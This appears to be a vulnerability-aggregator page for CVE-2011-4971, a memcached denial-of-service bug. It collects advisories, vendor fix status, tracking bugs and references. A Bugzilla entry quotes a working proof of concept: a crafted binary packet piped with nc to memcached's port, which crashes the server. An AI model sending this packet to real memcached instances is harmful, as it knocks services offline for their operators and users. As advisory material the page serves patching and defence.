CVE-2011-4971
published 2013-12-12CVE-2011-4971: Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4)…
PriorityP334medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
22.32%
97.4th percentile
Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | memcached | < memcached 1.4.13-0.3 (bookworm) | memcached 1.4.13-0.3 (bookworm) |
| memcached | memcached | <= 1.4.5 | — |
| memcached | memcached | — | — |
| memcached | memcached | — | — |
| memcached | memcached | — | — |
| memcached | memcached | — | — |
| memcached | memcached | — | — |
| memcached | memcached | — | — |
| memcached | memcached | — | — |
| memcached | memcached | >= 0 < 1.4.13-0.3 | 1.4.13-0.3 |
| memcached | memcached | >= 0 < 1.4.13-0.3 | 1.4.13-0.3 |
| memcached | memcached | >= 0 < 1.4.13-0.3 | 1.4.13-0.3 |
| memcached | memcached | >= 0 < 1.4.13-0.3 | 1.4.13-0.3 |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv5.0MEDIUM
vendor_debian5.0MEDIUM
vendor_redhat5.0MEDIUM
vendor_ubuntu5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pj3v-4mjw-vvpv: Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_a
ghsa_unreviewed·2022-05-14
CVE-2011-4971 [MEDIUM] GHSA-pj3v-4mjw-vvpv: Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_a
Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
OSV
CVE-2011-4971: Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_a
osv·2013-12-12·CVSS 5.0
CVE-2011-4971 [MEDIUM] CVE-2011-4971: Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_a
Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
Ubuntu
Memcached vulnerabilities
vendor_ubuntu·2014-01-13·CVSS 5.0
CVE-2011-4971 [MEDIUM] Memcached vulnerabilities
Title: Memcached vulnerabilities
Summary: Several security issues were fixed in Memcached.
Stefan Bucur discovered that Memcached incorrectly handled certain large
body lengths. A remote attacker could use this issue to cause Memcached to
crash, resulting in a denial of service. (CVE-2011-4971)
Jeremy Sowden discovered that Memcached incorrectly handled logging certain
details when the -vv option was used. An attacker could use this issue to
cause Memcached to crash, resulting in a denial of service. (CVE-2013-0179)
It was discovered that Memcached incorrectly handled SASL authentication.
A remote attacker could use this issue to bypass SASL authentication
completely. This issue only affected Ubuntu 12.10, Ubuntu 13.04 and Ubuntu
13.10. (CVE-2013-7239)
Instructions: In general, a stan
Red Hat
memcached: specially crafted packet segmentation fault
vendor_redhat·2011-05-15·CVSS 5.0
CVE-2011-4971 [MEDIUM] memcached: specially crafted packet segmentation fault
memcached: specially crafted packet segmentation fault
Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
Package: memcached (CloudForms Management Engine 5) - Will not fix
Package: memcached (Red Hat Enterprise Linux 6) - Will not fix
Package: memcached (Red Hat Enterprise Linux 7) - Not affected
Debian
CVE-2011-4971: memcached - Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process...
vendor_debian·2011·CVSS 5.0
CVE-2011-4971 [MEDIUM] CVE-2011-4971: memcached - Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process...
Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
Scope: local
bookworm: resolved (fixed in 1.4.13-0.3)
bullseye: resolved (fixed in 1.4.13-0.3)
forky: resolved (fixed in 1.4.13-0.3)
sid: resolved (fixed in 1.4.13-0.3)
trixie: resolved (fixed in 1.4.13-0.3)
No detection rules found.
arXiv
Unlimited Lives: Secure In-Process Rollback with Isolated Domains
arxiv_fulltext·2023-04-21
Unlimited Lives: Secure In-Process Rollback with Isolated Domains
Unlimited Lives: Secure In-Process Rollback with Isolated Domains
Merve G\"ulmez
Ericsson Security Research
Kista, Sweden
imec-Distrinet, KU Leuven
Leuven, Belgium
merve.gulmez
@kuleuven.be
Thomas Nyman
Ericsson Product Security
Jorvas, Finland
thomas.nyman
@ericsson.com
Christoph Baumann
Ericsson Security Research
Kista, Sweden
christoph.baumann
@ericsson.com
Jan Tobias M\"uhlberg
imec-Distrinet, KU Leuven
Leuven, Belgium
Université Libre de Bruxelles
Brussels, Belgium
[email protected]
Unlimited Lives: Secure In-Process Rollback with Isolated
Domains
Merve Turhan
Ericsson Security Research
imec-DistriNet, KU Leuven
Thomas Nyman
Ericsson Product Security
Christoph Baumann
Ericsson Security Research
Jan Tobias M\"uhlberg
imec-DistriNet, KU Leuven
## Abstra
arXiv
Intel MPX Explained: An Empirical Study of Intel MPX and Software-based Bounds Checking Approaches
arxiv_fulltext·2017-06-16
Intel MPX Explained: An Empirical Study of Intel MPX and Software-based Bounds Checking Approaches
Intel MPX Explained
An Empirical Study of Intel MPX and Software-based Bounds Checking Approaches
https://Intel-MPX.github.io
Oleksii Oleksenko^ , Dmitrii Kuvaiskii^
Pramod Bhatotia^*, Pascal Felber^ , and Christof Fetzer^
^ TU Dresden 5mm ^*The University of Edinburgh 5mm ^ University of Neuch\^atel
### Abstract
Memory-safety violations are a prevalent cause of both reliability and security vulnerabilities in systems software written in unsafe languages like C/C++.
Unfortunately, all the existing software-based solutions to this problem exhibit high performance overheads preventing them from wide adoption in production runs.
To address this issue, Intel recently released a new ISA extension---Memory Protection Extensions (), a hardware-assisted full-stack solution to protect against
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-6]
bugzilla·2013-04-30·CVSS 5.0
CVE-2011-4971 [MEDIUM] CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-6]
CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-6]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
epel-6 tracking bug fo
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-5]
bugzilla·2013-04-30·CVSS 5.0
CVE-2011-4971 [MEDIUM] CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-5]
CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-5]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
epel-5 tracking bug fo
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault [fedora-all]
bugzilla·2013-04-30·CVSS 5.0
CVE-2011-4971 [MEDIUM] CVE-2011-4971 memcached: specially crafted packet segmentation fault [fedora-all]
CVE-2011-4971 memcached: specially crafted packet segmentation fault [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
Please note: this issue
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault
bugzilla·2013-04-30·CVSS 5.0
CVE-2011-4971 [MEDIUM] CVE-2011-4971 memcached: specially crafted packet segmentation fault
CVE-2011-4971 memcached: specially crafted packet segmentation fault
This was originally reported by Stefan Bucur:
1. Start memcached in TCP mode. For example:
$ ./memcached -v -p 11211 -U 0
2. Send the specially crafted packet to it:
$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211
====
There is a patch mentioned in the original issue report, but the code has
changed significantly since then.
External References:
https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872
Discussion:
Created memcached tracking bugs for this i
http://insecurety.net/?p=872http://secunia.com/advisories/56183http://www.debian.org/security/2014/dsa-2832http://www.mandriva.com/security/advisories?name=MDVSA-2013:280http://www.securityfocus.com/bid/59567http://www.ubuntu.com/usn/USN-2080-1https://code.google.com/p/memcached/issues/detail?id=192https://puppet.com/security/cve/cve-2011-4971http://insecurety.net/?p=872http://secunia.com/advisories/56183http://www.debian.org/security/2014/dsa-2832http://www.mandriva.com/security/advisories?name=MDVSA-2013:280http://www.securityfocus.com/bid/59567http://www.ubuntu.com/usn/USN-2080-1https://code.google.com/p/memcached/issues/detail?id=192https://puppet.com/security/cve/cve-2011-4971
2013-12-12
Published